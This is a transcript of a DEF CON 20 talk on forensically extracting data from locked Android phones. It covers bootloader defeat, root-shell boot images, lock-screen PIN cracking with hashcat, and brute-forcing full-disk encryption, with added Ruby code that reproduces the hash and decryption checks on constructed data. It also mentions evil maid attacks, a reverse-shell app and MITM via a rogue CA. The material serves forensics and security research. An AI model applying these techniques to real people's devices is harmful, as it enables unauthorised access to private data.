Into The Droid: Gaining Access to Android User Data
viaForensics, DEF CON 20

Introduction
• Why this talk is useful
• Defend access / gain access
• Device seizure, loss, border crossing, stop and search, espionage...
• The company: viaForensics - mobile security and digital forensics, strong R&D team, government agencies and corporations
• The speaker: Thomas Cannon - Director of Breaking Things

What stands in the way:
• ADB off by default
• Screen lock
• Code signing for updates and boot images
• Encryption
• Variety of device hardware, software and configuration
CHALLENGE ACCEPTED

Bootloader Essentials
• How we use the bootloader
• Accessing bootloader mode
• Bootloader protocols
• Bootloader protection

Defeat The Bootloader (HTC example)
• S-ON vs S-OFF: the secuflag is controlled in the radio firmware
• Gold Card - specially formatted MicroSD card that can bypass the carrier ID check when flashing ROMs
• White Card - special SIM card used as an authentication token to control access to diagnostic mode

Defeat The Bootloader (HTC example)
• Emulate the White Card with hardware, combine with a Gold Card to enter diagnostics and clear S-ON

Defeat The Bootloader (HTC example)
• White Card not needed for CDMA phones
• Once S-OFF, a custom boot image can be RAM loaded
• This technique wipes most devices! But not all.
• Successfully used this technique to gain access to some locked stock HTC devices such as the HTC Desire
• Try it yourself with an XTC Clip

Forensic Boot
• Start early in the boot chain, before the system loads
• Provide an ADB root shell over USB which can be used to image the device
• Do not mount anything, including cache, to prevent any writes to partitions
• Devices with raw NAND flash and wear levelling implemented in software (YAFFS2) can be prevented from overwriting deleted data

Build Boot
    $ abootimg -x stock-recovery.img
    $ abootimg-unpack-initrd
    $ cd ramdisk
    (edit ramdisk contents)
    $ cd ..
    $ abootimg-pack-initrd -f
    $ abootimg -u stock-recovery.img -r initrd.img

RAM Disk Contents
• /dev
• /proc
• /sbin: adbd, busybox (+ symlinks), nanddump (to dump partitions)
• /sys
• init
• default.prop (enable root shell: ro.secure=0)
• init.rc (do not mount partitions, just start adbd)
• ueventd.rc

Flash and RAM Load
• Samsung
  • Dump partitions with ODIN <= 1.52 or Heimdall. Maybe.
  • Flashing with ODIN or Heimdall
  • heimdall flash --recovery recovery.bin (Epic 4G)
  • heimdall flash --kernel zImage (Galaxy S)
• HTC
  • fastboot boot recovery.img (RAM loading)
  • fastboot flash recovery recovery.img (flash partition)
• Motorola
  • sbf_flash image_name.sbf (make sure it only contains recovery)

How it works (diagram slide)

Flasher Box
• ORT
• Riff Box
• Medusa Box
[Diagram: JTAG header pinout (TRST, TCK, TDO, TDI, TMS, ...)]

Serial
• Some devices have debug access via serial cables which can be used to gain access to data
• On the Samsung Galaxy SII / Galaxy Note this is activated by grounding the ID pin of the USB connector with a 523K ohm resistor
• TTL serial access is provided on the D+ and D- pins of the USB connector
• Use a Bus Pirate and a MicroUSB breakout board to connect

Crack PIN or Password
• Salt
  • /data/data/com.android.providers.settings/databases/settings.db
  • SELECT * FROM secure WHERE name = 'lockscreen.password_salt'
• PIN / password
  • /data/system/password.key
  • Salted SHA1 of the password concatenated with salted MD5

Crack PIN or Password
• Calculate the value of the salt in lowercase hex with no padding
    $ python -c "print('%x' % 720624377925219614)"
    a002c0dbeb8351e
• Copy the last 32 bytes of password.key (the MD5 hash in hex), add a colon and then add the salt
    5D8EC41CB1812AC0BD9CB6C4F2CD0122:a002c0dbeb8351e
• Crack with software such as oclHashcat-lite
[Screenshots: hashcat-gui driving cudaHashcat-lite with hash type md5($pass.$salt), custom charset ?d and mask ?1?1?1?1?1?1?1?1?1 (password length 4-9); on a GeForce GTX 560M the 9-digit PIN is recovered in 2 seconds and a 6-character password (mask ?1?1?1?1?1?1) in 47 seconds]
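The following Ruby is an added worked example, not code from the deck or from viaForensics: it reproduces the password.key format described on the two slides above (salt rendered as unpadded lowercase hex, SHA-1 and MD5 of password + salt stored as uppercase hex) so the format can be checked against a known PIN. The function names and the PIN 1234 are chosen here; the salt value is the one quoted in the deck.

```ruby
require 'digest'

# Lock screen credential hash as laid out in the deck: the salt from settings.db
# is a signed 64-bit integer rendered as lowercase hex with no padding (what Java's
# Long.toHexString does, including two's complement for negative values).
def salt_to_hex(salt)
  (salt & 0xFFFFFFFFFFFFFFFF).to_s(16)
end

# password.key content: SHA-1(password + salt_hex) followed by MD5(password + salt_hex),
# both as uppercase hex, 40 + 32 = 72 characters. One hash pass each, no stretching.
def password_key(password, salt_hex)
  salted = password + salt_hex
  (Digest::SHA1.hexdigest(salted) + Digest::MD5.hexdigest(salted)).upcase
end

# The trailing 32 characters are the MD5 digest the deck pairs with the salt. Checking a
# candidate costs a single MD5, so a 4-digit PIN (10**4 candidates) offers no real
# offline resistance; this is the weakness the deck's cracking slides rely on.
def md5_part(stored_key)
  stored_key[-32, 32]
end

def credential_matches?(candidate, salt_hex, stored_key)
  Digest::MD5.hexdigest(candidate + salt_hex).upcase == md5_part(stored_key)
end

if __FILE__ == $PROGRAM_NAME
  salt_hex = salt_to_hex(720_624_377_925_219_614) # salt value quoted in the deck
  key = password_key('1234', salt_hex)             # constructed PIN, not the deck's
  puts "salt (hex):    #{salt_hex}"
  puts "password.key:  #{key}"
  puts "md5:salt line: #{md5_part(key)}:#{salt_hex}"
  puts "matches 1234?  #{credential_matches?('1234', salt_hex, key)}"
end
```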
HID Brute Force? (video)
• AVR ATMEGA32U4 emulates a USB keyboard typing PINs
• USB OTG cable for USB host
• Devices usually rate limit attempts and wipe after too many incorrect passcodes

Force Android Encryption
[Screenshots: Nexus S running Android 4.0.4 (build IMM76D, baseband I9020XXKI1, kernel 3.0.8-g6656123); the "Encrypt phone" dialog warns that a numeric PIN or password is required at every power-on, that encryption can only be undone by a factory data reset, that it takes an hour or more and needs a charged, plugged-in phone; then "Encrypting... 5% complete"]

Android Encryption
• Supported since Android 3.0
• Based on dm-crypt
• AES 128 CBC
• Implementations may vary, e.g. Samsung has their own key management module

Android Encryption (key wrapping)
• Password/PIN -> PBKDF2, 2000 iterations, keylen=32, with a 128-bit salt from /dev/urandom -> Key+IV (32 bytes) = Key (128 bit) + IV (128 bit)
• Master Key (128 bit) -> AES 128 CBC under that Key and IV -> Encrypted Master Key (128 bit)

Android Encryption (data)
• Master Key (128 bit) with per-sector IV (ESSIV:SHA256) -> AES 128 CBC -> userdata partition <-> encrypted userdata partition

Cracking Encryption
    struct crypt_mnt_ftr {
        __le32 magic;
        __le16 major_version;
        __le16 minor_version;
        __le32 ftr_size;
        __le32 flags;
        __le32 keysize;
        __le32 spare1;
        __le64 fs_size;
        __le32 failed_decrypt_count;
        /* remaining fields not shown on the slide */
    };
• Encrypted Master Key + Salt stored in the footer
• Footer stored at the end of the partition, in a footer file on another partition, or as a partition itself
• Image the device and locate the footer + encrypted userdata partition

Cracking Encryption
• Parse the footer
• Locate the Salt and Encrypted Master Key
• Run a password guess through PBKDF2 with the salt, use the resulting key and IV to decrypt the master key, then use the resulting master key to decrypt the first sector of the encrypted image. If the password is correct, plain text will be revealed.
[Screenshots: footer parser output showing Magic 0xD0B5B1C4, Major Version 1, Footer Size 104 bytes, Flags 0x00000000, Key Size 128 bits, Crypto Type aes-cbc-essiv:sha256, the Encrypted Key and Salt, and for each trial password (1234, then 5555) the Derived Key, Derived IV, Decrypted Key, ESSIV IV and Decrypted Data]
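The check described in the two Cracking Encryption slides above, as an added Ruby example written for this page (not the deck's parser): PBKDF2 over 2000 iterations yields key and IV, AES-128-CBC unwraps the master key, and the ESSIV:SHA256 IV lets the first sector be decrypted and inspected. The footer values, master key and sector contents are constructed inside the block, the function names are chosen here, and it assumes dm-crypt's ESSIV definition (IV = AES over the little-endian sector number, keyed by SHA-256 of the master key) and a single 16-byte wrapped key block.

```ruby
require 'openssl'
# PBKDF2-HMAC-SHA1, 2000 rounds, 32 bytes out: first 16 are the AES-128 key,
# last 16 the IV used to wrap the master key (the "Key+IV (32 bytes)" box).
def derive_key_iv(password, salt)
  kiv = OpenSSL::PKCS5.pbkdf2_hmac_sha1(password, salt, 2000, 32)
  [kiv[0, 16], kiv[16, 16]]
end

# Unpadded AES-128-CBC in either direction (encrypt only builds the fixture below).
def aes128_cbc(key, iv, data, mode)
  c = OpenSSL::Cipher.new('AES-128-CBC')
  mode == :encrypt ? c.encrypt : c.decrypt
  c.padding = 0
  c.key = key
  c.iv = iv
  c.update(data) + c.final
end

# Footer step: decrypt the 16-byte encrypted master key with the derived key and IV.
def unwrap_master_key(password, salt, encrypted_master_key)
  key, iv = derive_key_iv(password, salt)
  aes128_cbc(key, iv, encrypted_master_key, :decrypt)
end

# aes-cbc-essiv:sha256 (assumed dm-crypt semantics): the IV for a sector is its
# little-endian 64-bit number encrypted with AES keyed by SHA-256(master key).
def essiv_iv(master_key, sector)
  c = OpenSSL::Cipher.new('AES-256-ECB')
  c.encrypt
  c.padding = 0
  c.key = OpenSSL::Digest::SHA256.digest(master_key)
  c.update([sector].pack('Q<') + "\0" * 8) + c.final
end

def sector_crypt(master_key, sector, data, mode)
  aes128_cbc(master_key, essiv_iv(master_key, sector), data, mode)
end

# Constructed fixture standing in for the footer fields and an imaged userdata partition.
MASTER_KEY = OpenSSL::Digest::MD5.digest('constructed 128-bit master key')
SALT = OpenSSL::Digest::MD5.digest('constructed 128-bit salt')
SECTOR0 = 'userdata sector 0 (constructed plaintext)'.ljust(512, "\0").b
ENC_MASTER_KEY = aes128_cbc(*derive_key_iv('1234', SALT), MASTER_KEY, :encrypt)
ENC_SECTOR0 = sector_crypt(MASTER_KEY, 0, SECTOR0, :encrypt)
# The check the deck describes: unwrap, then decrypt sector 0 and see whether it reads.
def decrypt_first_sector(password)
  sector_crypt(unwrap_master_key(password, SALT, ENC_MASTER_KEY), 0, ENC_SECTOR0, :decrypt)
end
puts decrypt_first_sector('1234') == SECTOR0 ? 'password 1234: plaintext recovered' : 'no match'
```

With the wrong password every block of sector 0 decrypts to noise, which is exactly the distinguisher the slide relies on; it also shows why only 2000 PBKDF2 rounds in front of a short PIN buys little.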
Cracking Encryption
• Cracking PINs takes seconds. Passwords are usually short or follow patterns because they are the same as the lock screen password.

Evil Maid Attack
• Load an app onto the system partition, wait for the user to boot the phone, get remote access to the decrypted user data
• Rootkits - easy to compile for Android
• Evil USB charger

Reverse Shell
[Screenshots: vF Android WebShell running in the emulator (5554:Android-2.3) and listing the SD card, which holds AndRevShell.apk; andrevshell.py reports "RevShell Server running on port 8080"]
• An app with no permissions can create a reverse shell, giving remote access to the attacker

Desperate Techniques
• Hard reset - some devices prior to 3.0 did not wipe data properly. Wipe, boot, root and recover
• Chip-off - de-solder the NAND chips
• Screen smudges

More Techniques!
• Custom update.zip - can you get one signed?
• Race condition on updates via SD cards - fixed
• Own a CA? Who doesn't these days? MITM the connection, push an app, update or exploit
• Entry via Google Play, if credentials are cached on the desktop

Santoku Linux
• Free and open bootable Linux distribution full of tools
• Project is a collaboration with other mobile security pros
• Mobile Forensics, Mobile App Security Testing, Mobile Malware Analysis
• Check out the Alpha release at https://santoku-linux.com

viaForensics
Thomas Cannon
@thomas.cannon
github.com/thomascannon
tcannon@viaforensics.com
For the latest versions of our presentations visit: https://viaforensics.com/resources/presentations